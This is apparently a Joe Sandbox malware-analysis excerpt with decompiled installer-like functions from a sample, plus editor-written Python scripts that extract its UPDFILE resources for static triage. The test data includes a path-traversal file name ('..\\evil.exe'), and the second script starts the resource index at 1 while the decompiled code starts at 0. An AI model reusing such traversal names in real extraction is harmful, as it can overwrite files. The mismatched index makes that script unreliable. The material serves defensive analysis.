                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                    • Opcode ID: 9a1bb4da358f0f66646059fef5e6c64082bc4cf65b62a25acea30e8922a44cb3
                                                                                                                                                                                                    • Instruction ID: 352b407d5c53ff6d282dae17f09eaa34abc5813b50fa7f47beea17352eceb9bb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a1bb4da358f0f66646059fef5e6c64082bc4cf65b62a25acea30e8922a44cb3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68414734604285AFDF25AF349C54AFDBFA99F52310F0440DAE8C683606DB758E86CBA1
                                                                                                                                                                                                     Uniqueness
                                                                                                                                                                                                     Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E001343D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				struct tagRECT _v24;
                                                                                                                                                                                                    				struct tagRECT _v40;
                                                                                                                                                                                                    				struct HWND__* _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				int _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				int _v60;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				struct HWND__* _t63;
                                                                                                                                                                                                    				struct HWND__* _t67;
                                                                                                                                                                                                    				struct HWND__* _t68;
                                                                                                                                                                                                    				struct HDC__* _t69;
                                                                                                                                                                                                    				int _t72;
                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t63 = __edx;
                                                                                                                                                                                                    				_t29 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                    				_t68 = __edx;
                                                                                                                                                                                                    				_v44 = __ecx;
                                                                                                                                                                                                    				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                    				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                    				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                    				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                    				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                    				_t69 = GetDC(_v44);
                                                                                                                                                                                                    				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                    				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                    				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                    				_t56 = _v48;
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                    				_t67 = 0;
                                                                                                                                                                                                    				if(_t72 >= 0) {
                                                                                                                                                                                                    					_t63 = _v52;
                                                                                                                                                                                                    					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                    						_t72 = _t63 - _t56;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t72 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                    				if(_t59 >= 0) {
                                                                                                                                                                                                    					_t63 = _v60;
                                                                                                                                                                                                    					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                    						_t59 = _t63 - _t53;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t59 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                     				// x (_t72) and y (_t59) were computed above by centring the window on its parent and clamping
                                                                                                                                                                                                     				// to the screen size read with GetDeviceCaps(HORZRES/VERTRES). Flags 5 = SWP_NOSIZE | SWP_NOZORDER,
                                                                                                                                                                                                     				// so only the position changes. E00136CE0 is the /GS cookie check run on the way out.
                                                                                                                                                                                                     				return E00136CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                     			}

(Disassembly listing for the window-positioning function at 0x001343d0-0x001344b8 omitted: only the instruction-address column survived extraction.)

APIs
• GetWindowRect.USER32(?,?), ref: 001343F1
• GetWindowRect.USER32(00000000,?), ref: 0013440B
• GetDC.USER32(?), ref: 00134423
• GetDeviceCaps.GDI32(00000000,00000008), ref: 0013442E (index 8 = HORZRES, screen width in pixels)
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 0013443A (index 0xA = VERTRES, screen height in pixels)
• ReleaseDC.USER32(?,00000000), ref: 00134447
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001344A2 (flags 5 = SWP_NOSIZE | SWP_NOZORDER)
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Window$CapsDeviceRect$Release
• String ID:
• API String ID: 2212493051-0
• Opcode ID: df1e52ce73fe13dc9beef34a362181bb21c8ae0289d1b4f13af8dc8cbe28f50f
• Instruction ID: adb71d80318d26b211c2474ec0a9adfaa30c0adb796e4d7ee637f6fa59813547
• Opcode Fuzzy Hash: df1e52ce73fe13dc9beef34a362181bb21c8ae0289d1b4f13af8dc8cbe28f50f
• Instruction Fuzzy Hash: E1310972E00119AFCB14CFB8DD899EEBBB9EF89310F554169F805B7250DB70AD458B60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 53%
			E00136298(intOrPtr __ecx, intOrPtr* __edx) {
				// Walks RT_RCDATA resources named UPDFILE0, UPDFILE1, ... in the sample's own image and
				// hands each one to the callback passed in ECX. The code below is the decompiler's
				// rendering, unchanged; the comments are the editor's reading of it.
				signed int _v8;           // /GS stack cookie (__security_cookie ^ EBP)
				char _v28;                // 20-byte buffer holding the formatted resource name
				intOrPtr _v32;            // callback (from __ecx) invoked once per resource
				struct HINSTANCE__* _v36; // running resource index (typed as HINSTANCE by the decompiler)
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x138004; // __security_cookie; value observed in this run: 0xe764604f
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1; // return value: 1 = every resource processed, 0 = a resource could not be locked or the callback refused one
				E0013171E( &_v28, 0x14, "UPDFILE%lu", 0); // snprintf-style helper: builds "UPDFILE0"
				while(1) {
					_t51 = _t51 + 0x10; // ESP clean-up after the cdecl formatting call (4 arguments)
					_t21 = FindResourceA(_t46,  &_v28, 0xa); // hModule NULL = own image; type 0xa = RT_RCDATA
					if(_t21 == 0) {
						break; // no UPDFILEn with this index: normal end of the walk, _t36 is still 1
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x139124 = 0x80070714; // HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND) stored in a global status
						_t36 = _t46;             // _t46 is 0 here, so the function returns 0
					} else {
						// Resource layout, read off the pointer arithmetic that follows:
						//   +0  DWORD (meaning not stated in the report)
						//   +4  DWORD (meaning not stated in the report)
						//   +8  NUL-terminated name
						//   then the payload, starting right after the terminator
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;     // name
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do { // inline strlen(name); not bounded by the resource size
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						// Indirect call through the pointer stored at 0x13a288, inside the read-only 0x13A000
						// region (consistent with an import thunk): (dword0, dword1, name, payload).
						 *0x13a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32(); // the ECX callback; its return value decides whether the walk continues
						if(_t51 != _t51) {
							asm("int 0x29"); // __fastfail if ESP does not match the saved value after the indirect call
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0; // callback refused the resource: release it and return 0
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							// Next name. The decompiler renders the argument as _v36 + 1 after _v36 was already
							// incremented; verify the exact index sequence against the disassembly before relying on it.
							E0013171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00136CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46); // cookie check, then return _t36
				}
				goto L12;
			}
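The resource walk above, replayed in Python as an added example by the editor (not code from the sample, from Joe Sandbox, or from any packer). It assumes the layout read off the decompiled pointer arithmetic (two DWORDs, a NUL-terminated name at offset 8, then the payload) and works on bytes already pulled out of the PE; for a real sample, take the bytes of each RT_RCDATA entry from a PE parser such as pefile. The resource directory below is constructed, and the two header DWORDs are exposed raw because the report does not say what they mean. Unlike the sample's inline strlen, the name scan is bounded by the resource size, and the example callback rejects names that could escape a drop directory, which is the check a triage script should make before writing any of these files out.

```python
"""
Parser and enumeration loop for the UPDFILE%lu RT_RCDATA resources walked by E00136298.

Added example; not code from the sample, Joe Sandbox or any packer. The
resource layout and the loop's stop conditions are taken from the decompiled
function; the sample resources at the bottom are constructed.
"""
import struct
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class UpdFile:
    index: int      # n in UPDFILEn
    field0: int     # DWORD at +0; meaning not stated in the report
    field4: int     # DWORD at +4; meaning not stated in the report
    name: str       # NUL-terminated string at +8
    payload: bytes  # everything after the terminator


def build_updfile(field0: int, field4: int, name: str, payload: bytes) -> bytes:
    """Serialise one resource in the layout the decompiled code reads (used for test data)."""
    return struct.pack("<II", field0, field4) + name.encode("ascii") + b"\x00" + payload


def parse_updfile(index: int, blob: bytes) -> UpdFile:
    """Split one UPDFILEn blob into header fields, name and payload.

    The name scan is bounded by the resource size, so a resource without a
    terminator raises instead of reading past the end of the mapping the way
    the sample's unbounded strlen loop would.
    """
    if len(blob) < 9:
        raise ValueError(f"UPDFILE{index}: {len(blob)} bytes is too short for an 8-byte header plus a name")
    field0, field4 = struct.unpack_from("<II", blob, 0)
    end = blob.find(b"\x00", 8)
    if end < 0:
        raise ValueError(f"UPDFILE{index}: name is not NUL-terminated inside the resource")
    name = blob[8:end].decode("ascii", errors="replace")
    return UpdFile(index, field0, field4, name, blob[end + 1:])


def walk_updfiles(resources: Dict[str, bytes],
                  callback: Callable[[UpdFile], bool]) -> Tuple[bool, List[UpdFile]]:
    """Replay the loop of E00136298 over an in-memory RT_RCDATA directory.

    Names are tried as UPDFILE0, UPDFILE1, ... until one is missing (the
    FindResourceA NULL case), which is the normal end and yields True, like the
    sample's return value of 1. A callback returning False stops the walk and
    yields False, like the sample's early return of 0. The returned list holds
    every resource that was parsed, including the one the callback refused.
    """
    seen: List[UpdFile] = []
    index = 0
    while True:
        blob = resources.get(f"UPDFILE{index}")
        if blob is None:
            return True, seen
        entry = parse_updfile(index, blob)
        seen.append(entry)
        if not callback(entry):
            return False, seen
        index += 1


def safe_name(entry: UpdFile) -> bool:
    """Example callback: accept only a bare file name, refusing anything that
    could leave the drop directory once the name is joined to a path."""
    bad = entry.name in ("", ".", "..") or any(c in entry.name for c in "/\\:\x00")
    return not bad


# Constructed RT_RCDATA directory (not taken from the sample): three entries,
# with a traversal name in the middle so the early-stop path is exercised.
SAMPLE_RESOURCES: Dict[str, bytes] = {
    "UPDFILE0": build_updfile(1, 0x1000, "config.dat", b"key=value\n"),
    "UPDFILE1": build_updfile(2, 0x2000, "..\\evil.exe", b"MZ\x90\x00"),
    "UPDFILE2": build_updfile(3, 0x3000, "payload.bin", b"\x00" * 16),
}


if __name__ == "__main__":
    ok, entries = walk_updfiles(SAMPLE_RESOURCES, lambda e: True)
    print(ok, [e.name for e in entries])  # True ['config.dat', '..\\evil.exe', 'payload.bin']
    ok, entries = walk_updfiles(SAMPLE_RESOURCES, safe_name)
    print(ok, [e.name for e in entries])  # False ['config.dat', '..\\evil.exe']
```

The accept-everything callback reproduces the sample's behaviour and stops only when UPDFILE3 is absent; safe_name stops at UPDFILE1, which is the point at which an extractor that trusted the embedded name would have written outside its working directory.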






















                                                                                                                                                                                                    0x00136298
                                                                                                                                                                                                    0x001362a0
                                                                                                                                                                                                    0x001362a7
                                                                                                                                                                                                    0x001362ad
                                                                                                                                                                                                    0x001362af
                                                                                                                                                                                                    0x001362bb
                                                                                                                                                                                                    0x001362c3
                                                                                                                                                                                                    0x001362c4
                                                                                                                                                                                                    0x0013633b
                                                                                                                                                                                                    0x0013633b
                                                                                                                                                                                                    0x00136345
                                                                                                                                                                                                    0x0013634d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001362da
                                                                                                                                                                                                    0x001362de
                                                                                                                                                                                                    0x0013635f
                                                                                                                                                                                                    0x00136369
                                                                                                                                                                                                    0x001362e0
                                                                                                                                                                                                    0x001362e0
                                                                                                                                                                                                    0x001362e0
                                                                                                                                                                                                    0x001362e3
                                                                                                                                                                                                    0x001362e5
                                                                                                                                                                                                    0x001362e5
                                                                                                                                                                                                    0x001362e8
                                                                                                                                                                                                    0x001362e8
                                                                                                                                                                                                    0x001362ea
                                                                                                                                                                                                    0x001362eb
                                                                                                                                                                                                    0x001362ef
                                                                                                                                                                                                    0x001362f1
                                                                                                                                                                                                    0x001362f3
                                                                                                                                                                                                    0x00136302
                                                                                                                                                                                                    0x00136308
                                                                                                                                                                                                    0x0013630d
                                                                                                                                                                                                    0x00136314
                                                                                                                                                                                                    0x00136314
                                                                                                                                                                                                    0x00136316
                                                                                                                                                                                                    0x00136319
                                                                                                                                                                                                    0x00136355
                                                                                                                                                                                                    0x00136357
                                                                                                                                                                                                    0x0013631b
                                                                                                                                                                                                    0x0013631b
                                                                                                                                                                                                    0x00136331
                                                                                                                                                                                                    0x00136334
                                                                                                                                                                                                    0x00136339
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136339
                                                                                                                                                                                                    0x00136319
                                                                                                                                                                                                    0x0013636b
                                                                                                                                                                                                    0x0013637d
                                                                                                                                                                                                    0x0013637d
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013171E: _vsnprintf.MSVCRT ref: 00131750
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001351CA,00000004,00000024,00132F71,?,00000002,00000000), ref: 001362CD
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001351CA,00000004,00000024,00132F71,?,00000002,00000000), ref: 001362D4
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001351CA,00000004,00000024,00132F71,?,00000002,00000000), ref: 0013631B
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00136345
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001351CA,00000004,00000024,00132F71,?,00000002,00000000), ref: 00136357
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                    • Opcode ID: fcc5cbd82b55aeed3a213885cdde1ae2543d1d49e7c4e7d9dd4e83fe4c00c486
                                                                                                                                                                                                    • Instruction ID: acd16235f833081d59427b5b19d0cab732a5c720b4bd6c6edfa0c023eb482e74
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcc5cbd82b55aeed3a213885cdde1ae2543d1d49e7c4e7d9dd4e83fe4c00c486
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF21F171A00219BBDB149FA48C459BFBB7CFF48710F044129FA46A3641DB759D468BE0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
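The loop above builds resource names with "UPDFILE%lu" (E0013171E wraps _vsnprintf according to the API list) and the function's imports are FindResourceA, LoadResource, LockResource and FreeResource; the recorded FindResourceA(00000000, 00000004, 0000000A) call uses the process image (NULL hModule), an integer name (4) and type 0x0A, which is RT_RCDATA. The static counterpart an analyst wants is to pull those same RCDATA resources out of the file without running it. The following is an added example written for this report, not code from the sample or from Joe Sandbox: a minimal PE resource-directory walker that collects every RT_RCDATA resource named UPDFILE<n>, plus a constructed .rsrc section so it runs offline. It assumes the caller supplies the raw .rsrc bytes and that section's RVA (a PE parser such as pefile would provide both for a real file), and the stop-at-first-gap walk in in_loader_order is an assumption about how a "%lu" counter loop of this shape typically terminates.

```python
import re
import struct

RT_RCDATA = 10                      # resource type the listing looks up (lpType 0x0000000A)
UPDFILE_RE = re.compile(r"^UPDFILE(\d+)$")


def _read_name(blob: bytes, off: int) -> str:
    """IMAGE_RESOURCE_DIR_STRING_U: 16-bit character count, then UTF-16LE text."""
    (count,) = struct.unpack_from("<H", blob, off)
    return blob[off + 2:off + 2 + 2 * count].decode("utf-16le")


def _entries(blob: bytes, dir_off: int):
    """Yield (name_or_id, is_subdirectory, target_offset) for one IMAGE_RESOURCE_DIRECTORY."""
    n_named, n_id = struct.unpack_from("<HH", blob, dir_off + 12)
    pos = dir_off + 16
    for _ in range(n_named + n_id):
        name_field, off_field = struct.unpack_from("<II", blob, pos)
        pos += 8
        key = _read_name(blob, name_field & 0x7FFFFFFF) if name_field & 0x80000000 else name_field
        yield key, bool(off_field & 0x80000000), off_field & 0x7FFFFFFF


def find_updfile_resources(rsrc: bytes, rsrc_rva: int) -> dict:
    """Map n -> payload bytes for every RT_RCDATA resource named UPDFILE<n>.

    Levels are type / name / language; the leaf IMAGE_RESOURCE_DATA_ENTRY holds
    an RVA, so it is rebased against the section RVA to index into `rsrc`.
    """
    found = {}
    for rtype, is_dir, type_off in _entries(rsrc, 0):
        if rtype != RT_RCDATA or not is_dir:
            continue
        for name, is_dir2, name_off in _entries(rsrc, type_off):
            match = UPDFILE_RE.match(name) if isinstance(name, str) else None
            if not match or not is_dir2:
                continue
            for _lang, is_dir3, leaf_off in _entries(rsrc, name_off):
                if is_dir3:
                    continue
                data_rva, size = struct.unpack_from("<II", rsrc, leaf_off)
                start = data_rva - rsrc_rva
                found[int(match.group(1))] = rsrc[start:start + size]
    return found


def in_loader_order(found: dict) -> list:
    """Walk UPDFILE1, UPDFILE2, ... as a "%lu" counter loop would, stopping at the first gap
    (assumption: the loader stops when FindResourceA fails for the next name)."""
    out, i = [], 1
    while i in found:
        out.append(found[i])
        i += 1
    return out


def build_sample_rsrc(resources: dict, rsrc_rva: int = 0x3000) -> bytes:
    """Construct a minimal .rsrc section (sample data, not taken from the analysed file):
    one RT_RCDATA type directory, one named entry per resource, language 0x409."""
    names = list(resources)
    n = len(names)
    type_dir = 24                                        # root dir (16) + one entry (8)
    name_dirs = [40 + 8 * n + 24 * i for i in range(n)]  # after the type dir (16 + 8n)
    leaves = [40 + 32 * n + 16 * i for i in range(n)]    # after n name dirs of 24 bytes
    str_offs, pos = [], 40 + 48 * n                      # after n data entries of 16 bytes
    for nm in names:
        str_offs.append(pos)
        pos += 2 + 2 * len(nm)
    data_offs = []
    for nm in names:
        data_offs.append(pos)
        pos += len(resources[nm])

    def directory(entries, n_named):
        out = struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, len(entries) - n_named)
        return out + b"".join(struct.pack("<II", a, b) for a, b in entries)

    blob = directory([(RT_RCDATA, 0x80000000 | type_dir)], 0)
    blob += directory([(0x80000000 | str_offs[i], 0x80000000 | name_dirs[i]) for i in range(n)], n)
    for i in range(n):
        blob += directory([(0x409, leaves[i])], 0)
    for i, nm in enumerate(names):
        blob += struct.pack("<IIII", rsrc_rva + data_offs[i], len(resources[nm]), 0, 0)
    for nm in names:
        blob += struct.pack("<H", len(nm)) + nm.encode("utf-16le")
    for nm in names:
        blob += resources[nm]
    assert len(blob) == pos
    return blob
```

On a real file, read the .rsrc section bytes and its VirtualAddress from the section table and pass them to find_updfile_resources; anything it returns is what the loader would have obtained from LoadResource/LockResource at runtime, so it is the right input for the next stage of static analysis (and for hashing against the dropped files in this report).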

                                                                                                                                                                                                    C-Code - Quality: 94%
			E0013681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				int** _t40; // used below but left undeclared by the decompiler
				intOrPtr _t41;
				long _t43; // likewise
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x138004; // 0xe764604f  compiler stack-protector cookie
				_v8 = _t19 ^ _t44; // cookie ^ frame pointer, re-checked on return
				_t41 =  *0x1381d8; // 0x0  cached result; 0xfffffffe means "not yet evaluated" (already 0 at dump time, so the probe had run and failed on the sandbox host)
				_t43 = 0;
				_v180 = 0xc; // cbData for RegQueryValueExA: _v20 holds at most 12 bytes
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x1381d8 = 0; // default to 0; any failed step below leaves it there
					_v168.dwOSVersionInfoSize = 0x94; // sizeof(OSVERSIONINFOA)
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x1381d8; // 0x0
					} else {
						_t41 = 1;
						// Every disjunct is a reason to give up: dwPlatformId 1 is VER_PLATFORM_WIN32_WINDOWS (Windows 9x), version must be 4.0x (minor < 0xa rules out 4.10 / Windows 98),
						// GetSystemMetrics(0x4a) is SM_MIDEASTENABLED, 0x80000001 is HKEY_CURRENT_USER and 0x20019 is KEY_READ.
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x131140, 0,  &_v184,  &_v20,  &_v180); // lpValueName 0x131140 is a string pointer the decompiler did not resolve
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E001366F9( &_v20,  &_v176) == 0) { // presumably converts the value string in _v20 to an integer in _v176 (its body is not on this page)
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff; // PRIMARYLANGID() of the LANGID
									if(_t35 == 1 || _t35 == 0xd) { // LANG_ARABIC or LANG_HEBREW
										 *0x1381d8 = _t41; // cache the positive result (1)
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00136CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43); // epilogue with the cookie check; _t41 is the function's result
                                                                                                                                                                                                    			}
(per-line instruction addresses for the C-code above, 0x0013681f .. 0x00136951, not reproduced)

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0013686E
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004A), ref: 001368A7
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001368CC
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00131140,00000000,?,?,0000000C), ref: 001368F4
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00136902
                                                                                                                                                                                                      • Part of subcall function 001366F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0013691A), ref: 00136741
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Control Panel\Desktop\ResourceLocale, xrefs: 001368C2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                    • API String ID: 3346862599-1109908249
                                                                                                                                                                                                    • Opcode ID: a059a654507556c8874b22ef63e4ee47528496e5e7004841569e57a468bd1a2b
                                                                                                                                                                                                    • Instruction ID: bcff2a611829ac62bb52da99d563769090a7f9b51c39e04d05465d402e119405
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a059a654507556c8874b22ef63e4ee47528496e5e7004841569e57a468bd1a2b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85316F71A00318AFDB21DF11CC45BAAB7B8EF45768F1041A5E94DA6150DBB09E89CF52
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Loads the "LICENSE" RT_RCDATA resource into a LocalAlloc'd buffer (pointer kept
			// at 0x138d4c), shows it in dialog template 0x7d1 and records the outcome as an
			// HRESULT at 0x139124. Returns 1 when the license is accepted or the resource
			// text is the literal "<None>", 0 otherwise.
			E00133A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0013468F(_t16, 0, 0) + 1; // 0x1 -- size query (FindResourceA/SizeofResource), +1 for the NUL
				_t3 = LocalAlloc(0x40, _t1); // 0x40 = LMEM_ZEROINIT
				 *0x138d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0013468F(_t16, _t3, _t28) != 0) { // second call copies the resource bytes into the buffer
						if(lstrcmpA( *0x138d4c, "<None>") == 0) { // "<None>" marks an empty license: nothing to show
							LocalFree( *0x138d4c);
							L9:
							 *0x139124 = 0; // S_OK
							return 1;
						}
						_t9 = E00136517(_t19, 0x7d1, 0, E00133100, 0, 0); // DialogBoxIndirectParamA, E00133100 is the dialog procedure
						LocalFree( *0x138d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x139124 = 0x800704c7; // HRESULT_FROM_WIN32(ERROR_CANCELLED): license declined
						L2:
						return 0;
					}
					E001344B9(0, 0x4b1, 0, 0, 0x10, 0); // LoadStringA(0x4b1) + MessageBoxA with MB_ICONERROR
					LocalFree( *0x138d4c);
					 *0x139124 = 0x80070714; // HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND)
					goto L2;
				}
				E001344B9(0, 0x4b5, 0, 0, 0x10, 0); // allocation failure message
				 *0x139124 = E00136285(); // GetLastError()
				goto L2;
			}
(per-line instruction addresses for the C-code above, 0x00133a46 .. 0x00133b21, not reproduced)

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
